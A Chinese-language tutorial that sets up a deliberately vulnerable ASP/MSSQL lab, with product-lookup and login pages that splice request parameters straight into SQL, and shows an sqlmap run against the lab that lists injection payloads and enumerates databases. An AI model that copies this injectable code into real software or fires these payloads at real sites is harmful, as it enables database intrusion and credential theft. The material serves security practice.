Mssql注入点构造

<%
dim prodId
prodId = Request.QueryString("id")
 
set conn = server.createObject("ADODB.Connection")
set rs = server.createObject("ADODB.Recordset")
 
query = "select prodName from products where id = " & prodId
 
conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=数据库; User Id=sa; Password=密码"
rs.activeConnection = conn
rs.open query
if not rs.eof then
response.write "Got product " & rs.fields("prodName").value
else
response.write "No product found"
end if
%>
SQL语句： 创建一个数据库，然后查询这些

create table products
(
id int identity(1,1) not null,
prodName varchar(50) not null,
)
 
insert into products(prodName) values('1')
insert into products(prodName) values('2')
insert into products(prodName) values('3')


root@Dis9Team:/pen# sqlmap -u "http://5.5.5.134/sql.asp?id=1" --dbs

sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool
http://www.2cto.com
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting at 13:10:54

[13:10:55] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file
[13:10:55] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[13:10:55] [INFO] testing connection to the target url
[13:10:55] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2431=2431

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1 AND 5223=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (5223=5223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)))

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id=-3220 UNION SELECT CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(102)+CHAR(75)+CHAR(122)+CHAR(97)+CHAR(84)+CHAR(120)+CHAR(83)+CHAR(79)+CHAR(83)+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)-- 
 
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=1; WAITFOR DELAY '0:0:5';--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=1 WAITFOR DELAY '0:0:5'--
---

[13:10:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[13:10:55] [INFO] fetching database names
[13:10:55] [INFO] the SQL query used returns 5 entries
[13:10:55] [INFO] retrieved: "master"
[13:10:55] [INFO] retrieved: "model"
[13:10:55] [INFO] retrieved: "msdb"
[13:10:55] [INFO] retrieved: "myDB"
[13:10:55] [INFO] retrieved: "tempdb"
available databases [5]: 
[*] master
[*] model
[*] msdb
[*] myDB
[*] tempdb
 
[13:10:55] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'

[*] shutting down at 13:10:55
 
root@Dis9Team:/pen#

---------------------------------------------------伟大的分割线--
post sql
sql:

<PRE class="php; toolbar: true; auto-links: true;">create table users 
( 
userId int identity(1,1) not null, 
userName varchar(50) not null, 
userPass varchar(20) not null 
) 
insert into users(userName, userPass) values('john', 'doe') 
insert into users(userName, userPass) values('admin', 'wwz04ff') 
insert into users(userName, userPass) values('fsmith', 'mypassword')</PRE>
view source

print?
asp:
view source

print?
<PRE class="php; toolbar: true; auto-links: true;"><% 
dim userName, password, query 
dim conn, rS 

userName = Request.Form("userName") 
password = Request.Form("password") 

set conn = server.createObject("ADODB.Connection") 
set rs = server.createObject("ADODB.Recordset") 
query = "select count(*) from users where userName='" & 
userName & "' and userPass='" & password & "'"

conn.Open "Provider=SQLOLEDB; Data Source=(local); 
Initial Catalog=myDB; User Id=sa; Password=" 
rs.activeConnection = conn 
rs.open query 

if not rs.eof then 
response.write "Logged In"
else
response.write "Bad Credentials"
end if
%>
</PRE>HTML提交表单：<PRE class="php; toolbar: true; auto-links: true;"><DIV class="postmessage firstpost"><PRE class="php; toolbar: true; auto-links: true;"><form name="frmLogin" action="ASP.asp" method="post"> 
Username: <input type="text" name="userName"> 
Password: <input type="text" name="password"><input type="submit"></form></PRE></DIV></PRE>